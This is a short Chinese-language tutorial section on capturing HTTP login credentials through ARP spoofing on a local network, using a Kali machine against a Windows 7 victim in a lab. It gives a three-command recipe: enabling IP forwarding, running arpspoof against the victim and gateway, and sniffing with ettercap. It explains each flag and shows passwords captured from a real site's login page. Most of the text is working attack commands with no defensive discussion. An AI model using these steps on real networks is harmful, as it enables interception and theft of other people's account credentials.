0x03 HTTP帐号及密码截获
本例主要的功能是截获指定机器的上网记录,主要记录的内容为登录的帐户及密码。
接下来说明一下测试环境中,各个机器的环境及IP地址。
网关:192.168.10.1
被截获的机器:Win7 192.168.10.178
Kali : 192.168.10.140
1. 数据转发
# IP流量转发(echo是不会有回显的) echo 1 >/proc/sys/net/ipv4/ip_forward
2. arp欺骗攻击
这里我们所使用的命令与之前我们所使用的断网攻击是同一个命令,也就是arpspoof,接下来我们直接操作吧。
# ARP欺骗,也是之前的断网攻击 arpspoof -i eth0 -t 192.168.10.178 192.168.10.1
命令中,-i eth0中,eth0为本机的网卡名称,大家需要根据自己的网卡名称对应修改。
命令中,-t 192.168.10.178中,192.168.10.178为被攻击机器的IP。
命令中,192.168.10.1为网关。
3. 嗅探网络内容
接下来我们要在kali中,重新打开一个命令窗口,之前的窗口不要关闭,命令也不要停止,使用ettercap 来监听网卡。
# 嗅探网络内容 ettercap -Tq -i eth0
-Tq : T是启动文本模式,q是安静模式
-i : 后接网卡名
接下来我们在Win7机器上,找个网站登录试一下,我们测试的地址是“http://www.weimob.com/website/login.html”。
我们在被嗅探的机器上,打开浏览器,输入用户名及密码,我们就可以查看到嗅探的用户名及密码。
命令汇总(只有三条命令)
# IP流量转发(echo是不会有回显的) echo 1 >/proc/sys/net/ipv4/ip_forward # ARP欺骗,也是之前的断网攻击 arpspoof -i eth0 -t 192.168.10.178 192.168.10.1 # 嗅探网络内容 ettercap -Tq -i eth0